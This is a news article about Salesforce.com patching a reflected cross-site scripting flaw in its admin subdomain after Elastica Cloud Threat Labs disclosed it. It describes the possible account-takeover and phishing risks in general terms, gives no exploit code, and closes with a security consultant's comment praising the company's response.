Salesforce.com has patched a cross site scripting flaw in a sub-domain which could have been exploited by hackers to hijack accounts or distribute malware.
The vulnerability in “admin.salesforce.com” could affect all Salesforce accounts for various different apps because the SaaS pioneer uses Single Sign On to manage multiple accounts, according to Elastica Cloud Threat Labs.
The company explained in a blog post:
“This subdomain was vulnerable to a reflected Cross-site Scripting (XSS) vulnerability where a specific function in the deployed application failed to sanitize and filter the arbitrary input passed by the remote user as a part of an HTTP request. As a result, the attacker could have executed JavaScript in the context of the application, thereby impacting the privacy and security of Salesforce users.”
There are three main ways that the flaw could be exploited, according to the firm.
The first could allow for account takeover if an attacker executes JavaScript to steal cookie and session identifiers.
Another involves the attacker forcing Salesforce users to visit phishing sites, or injecting pop-up windows designed for the same purpose.
Finally, a hacker could exploit the XSS flaw to force users to download malicious code on their machines by “executing unauthorized scripts in the context of the browser running a vulnerable application.”
Elastica validated one of these scenarios, demonstrating how easy it is to author a fake log-in pop-up designed to harvest a user’s credentials.
It explained further:
“Since we are able to inject JavaScripts from a remote location, it becomes quite easy to inject a pop-up in the primary webpage of the vulnerable application. We hosted the JavaScript on a third-party domain and passed it as a part of an injected JavaScript.”
Salesforce.com has now patched this vulnerability after being first informed of it by Elastica over a month ago.
“According to Salesforce, the impact is low because only selected users can be targeted,” Elastica explained. “However, we believe that this vulnerability has the potential to be exploited in the wild as shown in the earlier PoC, which could lead to potential account takeover since the primary domain is ‘salesforce.com’.”
Writing on the Tripwire blog, security consultant Graham Cluley welcomed the SaaS giant’s proactive stance.
“That’s a much better approach than putting your head in the sand, and hoping the problem will go away, or claiming that the threat is not serious or has not yet been exploited,” he argued.